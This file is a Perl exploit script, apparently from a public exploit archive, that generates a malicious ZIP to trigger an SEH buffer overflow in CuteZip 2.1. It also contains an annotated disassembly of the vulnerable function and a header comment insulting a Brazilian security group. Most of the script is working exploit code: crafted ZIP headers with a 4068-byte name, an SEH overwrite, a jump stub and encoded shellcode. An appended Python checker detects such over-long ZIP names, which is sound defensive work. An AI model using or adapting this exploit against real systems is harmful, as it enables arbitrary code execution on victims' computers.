#!/usr/bin/perl
#
#[+]Exploit Title: Exploit Buffer Overflow CuteZip 2.1
#[+]Date: 02\12\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.globalscape.com/files/cutezip20b.exe
#[+]Version: 2.1 build 9.24.1
#[+]Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN
#[+]CVE: N/A
#
#Comment in Brazilian Portuguese (translated to English)
#  ||
#  ||
#  \/
#
#Comment for those in Brazil:
#
#Hello, Brazilian lamers copying cake recipes off the internet, huh,
#a bunch of lamers who claim to be Metasploit Brazil.
#Guys, you don't even know how to program in ruby, perl, python, c or java.
#Study hard, don't soil the name of Metasploit.
#
#This message was for Metasploit Brasil; if you don't like it,
#contact me by e-mail.
#
#
#
#Comment:
#
# The zip structure of this exploit was copied from the Corelan Team's exploits
# Link: http://www.exploit-db.com/exploits/11764/
#
#
# Vulnerable function
#  ||
#  ||
#  \/
#
# 0x0047CC0E  .^72 CC            JB SHORT CuteZip.0047CBDC
# 0x0047CC10  .  F3:A5            REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
# 0x0047CC12  .  FF2495 C8CC470>  JMP DWORD PTR DS:[EDX*4+47CCC8]
# 0x0047CC19     8D49 00          LEA ECX,DWORD PTR DS:[ECX]
# 0x0047CC1C  >  23D1             AND EDX,ECX
# 0x0047CC1E  .  8A06             MOV AL,BYTE PTR DS:[ESI]
# 0x0047CC20  .  8807             MOV BYTE PTR DS:[EDI],AL
# 0x0047CC22  .  8A46 01          MOV AL,BYTE PTR DS:[ESI+1]
# 0x0047CC25  .  C1E9 02          SHR ECX,2
# 0x0047CC28  .  8847 01          MOV BYTE PTR DS:[EDI+1],AL
# 0x0047CC2B  .  83C6 02          ADD ESI,2
# 0x0047CC2E  .  83C7 02          ADD EDI,2
# 0x0047CC31  .  83F9 08          CMP ECX,8
# 0x0047CC34  .^72 A6            JB SHORT CuteZip.0047CBDC
# 0x0047CC36  .  F3:A5            REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>  ===> //Here is the instruction where the buffer overflow occurs
# 0x0047CC38  .  FF2495 C8CC470>  JMP DWORD PTR DS:[EDX*4+47CCC8]
# 0x0047CC3F     90               NOP
# 0x0047CC40  >  23D1             AND EDX,ECX
# 0x0047CC42  .  8A06             MOV AL,BYTE PTR DS:[ESI]
# 0x0047CC44  .  8807             MOV BYTE PTR DS:[EDI],AL
# 0x0047CC46  .  46               INC ESI
# 0x0047CC47  .  C1E9 02          SHR ECX,2
# 0x0047CC4A  .  47               INC EDI
# 0x0047CC4B  .  83F9 08          CMP ECX,8
# 0x0047CC4E  .^72 8C            JB SHORT CuteZip.0047CBDC
# 0x0047CC50  .  F3:A5            REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
# 0x0047CC52  .  FF2495 C8CC470>  JMP DWORD PTR DS:[EDX*4+47CCC8]
# 0x0047CC59     8D49 00          LEA ECX,DWORD PTR DS:[ECX]
#
#
#
#
#
#
#

use IO::File;

# $^O is "MSWin32" on Win32 Perl; string comparison with eq
if($^O eq "MSWin32")
{
    system("cls");
    system("color 4f");
}
else
{
    system("clear");
}

sub banner
{
    print q{
[+]Exploit: Exploit Buffer Overflow CuteZip 2.1
[+]Date: 02\\12\\2011
[+]Author: C4SS!0 G0M3S
[+]Home: www.invasao.com.br
[+]E-mail: Louredo_@hotmail.com
[+]Version: 2.1 build 9.24.1
[+]Thanks: Corelan Team, Skylined
[+]Impact: High
};
}

my $file = $ARGV[0];

if($#ARGV!=0)
{
    banner;
    print "[-]Usage: $0 <File Name>\n";
    print "[-]Example: $0 Exploit.zip\n";
    exit(0);
}

banner;

# Local file header (PK\x03\x04); name length field 0x0fe4 = 4068 bytes
my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";

# Central directory file header (PK\x01\x02), same 4068-byte name length
my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14".
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f".
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";

# End of central directory record (PK\x05\x06): one entry,
# central directory size 0x1012 at offset 0x1002
my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00".
"\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00".
"\x02\x10\x00\x00".
"\x00\x00";

my $payload = "\x41" x 1148;
my $nseh = "\xeb\x07\x90\x90";
my $seh = pack('V',0x0040112F);
my $egg = "\x41" x 2;
$egg .= "\x61\x61\x61\x51\x58\xFF\xD0";
my $shellcode = "\x41" x 123;

print "[*]Identifying the shellcode length\n";
sleep(1);

$shellcode = $shellcode.
"PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIOJDKJTSICL9MYQ8YRTQ4L".
"41K6IXI81WBLCZKKL6QQC4NUSV8KJMKLIY2JJN5RRQJJKMUKKOO9JZ7Z884POWXJJLXSS8CON5XJW912".
"6WONPTLG14NQQOQPMYLMQOSFQUN9FUSTKXQFKQUPL4OIS4W5U1T3FLHQ2EHPKOYKTDWZSHQMQM7MPBKL".#SHELLCODE WinExec("CALC",0);
"KVW7HKWHCNOP2NOKCHNMGNSO8LYMLS0OJTXRUPYQSFKNYFVBZK47DQVNZFBNGWMNPPQPZQV337XMPXCL".
"VLJ0C3C3CVKMWKRL0GWBLSP1NVKBSOUN4V7L8G8WKYNOJ2NMOOKTYTNLFE1XOFOHXHMNPZ5LRKOOUNLK".
"HLUVXGLMWHP7KWNMXSB644O4CEMVCLPO6QJ9KYJPKXJD4LCTYPOTYVTJTLSQ4OGKMRK8SI7D7BNMO2OB".
"K4BX0S5LKNQX14OM8646B9CZOA";

print "[*]The shellcode length is: ".(length($shellcode)-123)."\n";
sleep(1);

# Pad the entry name to 4064 bytes, then append ".txt" (4068 bytes total)
my $junk = "\x42" x (4064-length($payload.$nseh.$seh.$egg.$shellcode));
$payload = $payload.$nseh.$seh.$egg.$shellcode.$junk;
$payload = $payload.".txt";

my $Exploit = $ldf_header.$payload.
$cdf_header.$payload.
$eofcdf_header;

print "[*]Creating the file $file\n";
sleep(1);

open(f,">$file")|| die("Error:\n$!\n");
print f $Exploit;
close(f);

print "[*]The File $file Created Successfully\n";
sleep(1);
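The crash above is reached through an archive whose entry name is 0x0fe4 (4068) bytes long, far beyond anything a legitimate ZIP carries. The following Python is an added example, not part of the exploit or of CuteZip: a stand-alone checker that walks the End Of Central Directory record and the central directory file headers by hand (field layout per the PKWARE APPNOTE, the same fields the Perl above hard-codes), flags entry names longer than a threshold, and cross-checks the name length in each local file header against the central directory. A mail gateway or upload filter can run this before any extractor touches the file. The 260-byte threshold (Windows MAX_PATH) and the two sample archives built with `zipfile` are assumptions constructed for the demonstration.

```python
"""Scan a ZIP for over-long entry names and header inconsistencies.

Added example; not the exploit author's code and not CuteZip's.  The
parser is hand-written so that the check does not rely on a library
that might itself mishandle a malformed archive.
"""
import io
import struct
import zipfile

EOCD_SIG = b"PK\x05\x06"   # end of central directory record
CDFH_SIG = b"PK\x01\x02"   # central directory file header
LFH_SIG = b"PK\x03\x04"    # local file header
MAX_NAME_LEN = 260         # assumption: Windows MAX_PATH; tune per environment


def parse_central_directory(data: bytes):
    """Return [(name_len, name, local_header_offset), ...] from the central directory."""
    eocd_at = data.rfind(EOCD_SIG)
    if eocd_at < 0:
        raise ValueError("no end-of-central-directory record")
    # EOCD after the signature: disk(2) cd_disk(2) entries_on_disk(2)
    # entries_total(2) cd_size(4) cd_offset(4) comment_len(2)
    (_disk, _cd_disk, _n_disk, n_total, _cd_size, cd_offset,
     _comment_len) = struct.unpack_from("<HHHHIIH", data, eocd_at + 4)
    entries = []
    pos = cd_offset
    for _ in range(n_total):
        if data[pos:pos + 4] != CDFH_SIG:
            raise ValueError(f"bad central directory signature at {pos:#x}")
        # CDFH after the signature: ver_made(2) ver_need(2) flags(2) method(2)
        # time(2) date(2) crc(4) csize(4) usize(4) name_len(2) extra_len(2)
        # comment_len(2) disk(2) int_attr(2) ext_attr(4) local_header_off(4)
        fields = struct.unpack_from("<HHHHHHIIIHHHHHII", data, pos + 4)
        name_len, extra_len, comment_len, lh_off = (
            fields[9], fields[10], fields[11], fields[15])
        name = data[pos + 46:pos + 46 + name_len]
        entries.append((name_len, name, lh_off))
        pos += 46 + name_len + extra_len + comment_len
    return entries


def find_suspicious_entries(data: bytes, max_name_len: int = MAX_NAME_LEN):
    """Return a list of findings; an empty list means the archive looks sane."""
    findings = []
    for name_len, _name, lh_off in parse_central_directory(data):
        if name_len > max_name_len:
            findings.append(
                f"entry name length {name_len} exceeds {max_name_len} "
                f"(local header at {lh_off:#x})")
        if data[lh_off:lh_off + 4] != LFH_SIG:
            findings.append(
                f"central directory points at {lh_off:#x} but no local file header is there")
            continue
        # Local file header: name_len sits at offset 26 (after sig, ver, flags,
        # method, time, date, crc, csize, usize)
        (local_name_len,) = struct.unpack_from("<H", data, lh_off + 26)
        if local_name_len != name_len:
            findings.append(
                f"name length mismatch: central directory {name_len}, "
                f"local header {local_name_len}")
    return findings


def build_sample(name: str) -> bytes:
    """Constructed test archive: a single empty, stored entry with the given name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(name, b"")
    return buf.getvalue()


# Constructed samples: a normal entry name, and a 4068-byte name, the same
# 0x0fe4 length the exploit's headers declare (no payload bytes involved).
BENIGN = build_sample("readme.txt")
OVERLONG = build_sample("A" * 4064 + ".txt")

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("overlong", OVERLONG)):
        print(label, find_suspicious_entries(blob) or "OK")
```

Reading the central directory rather than trusting the first local header matters here: the exploit's local header and central directory both declare the long name, but an archive that disagrees between the two is exactly what parsers with different code paths trip over, so the mismatch is reported as a finding in its own right.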